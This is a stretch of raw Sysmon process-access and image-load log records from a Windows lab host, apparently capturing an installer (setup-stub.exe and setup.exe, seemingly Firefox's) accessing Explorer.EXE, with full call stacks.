13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 11241100x800000000000000015209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\osclientcerts.dll2021-01-18 13:59:52.489 10341000x800000000000000015208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000015202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.489{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.474{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
